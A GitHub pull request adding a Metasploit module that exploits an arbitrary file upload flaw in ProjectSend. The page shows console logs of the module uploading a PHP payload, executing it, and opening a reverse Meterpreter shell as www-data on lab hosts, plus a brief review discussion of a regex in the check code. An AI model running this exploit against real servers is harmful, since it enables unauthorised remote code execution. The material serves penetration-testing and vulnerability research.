
Add ProjectSend Arbitrary File Upload module #4459

Merged
merged 1 commit into from Dec 26, 2014


@bcoles bcoles commented Dec 23, 2014

Add ProjectSend Arbitrary File Upload module

Check

msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.

Run

msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)

elsif res.code.to_i == 200 && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
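
Review bot: The pattern on the last line, res.body =~ /sys.config.php/, leaves both dots unescaped, so each one matches any character and the test also accepts strings such as sys_config_php. If the intent is to match the literal file name, write it as /sys\.config\.php/. Both elsif branches also repeat res.code.to_i == 200; testing the status once before inspecting the body would make the branch logic easier to follow.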

@wchen-r7 wchen-r7 Dec 23, 2014

Is this supposed to be /sys\.config\.php/ or actually /sys.config.php/ ?

@bcoles bcoles Dec 23, 2014

The former; /sys\.config\.php/

@jvazquez-r7 jvazquez-r7 self-assigned this Dec 26, 2014

@jvazquez-r7 jvazquez-r7 commented Dec 26, 2014

testing...

@jvazquez-r7 jvazquez-r7 merged commit 5c82b8a into rapid7:master Dec 26, 2014
1 check passed

@jvazquez-r7 jvazquez-r7 commented Dec 26, 2014

Did minor cleanup here: b5b0be9

Test:

msf exploit(projectsend_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module
[*] 172.16.158.137:80 - Uploading file 'xozXXw1.php' (1794 bytes)
[+] 172.16.158.137:80 - Payload uploaded successfully (xozXXw1.php)
[*] 172.16.158.137:80 - Executing upload/files/xozXXw1.php...
[*] Sending stage (40499 bytes) to 172.16.158.137
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.137:38949) at 2014-12-26 11:23:44 -0600
[+] Deleted xozXXw1.php
[*] 172.16.158.137:80 - Request timed out while executing

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

thanks @bcoles ! landed

@bcoles bcoles deleted the projectsend_upload_exec branch May 5, 2015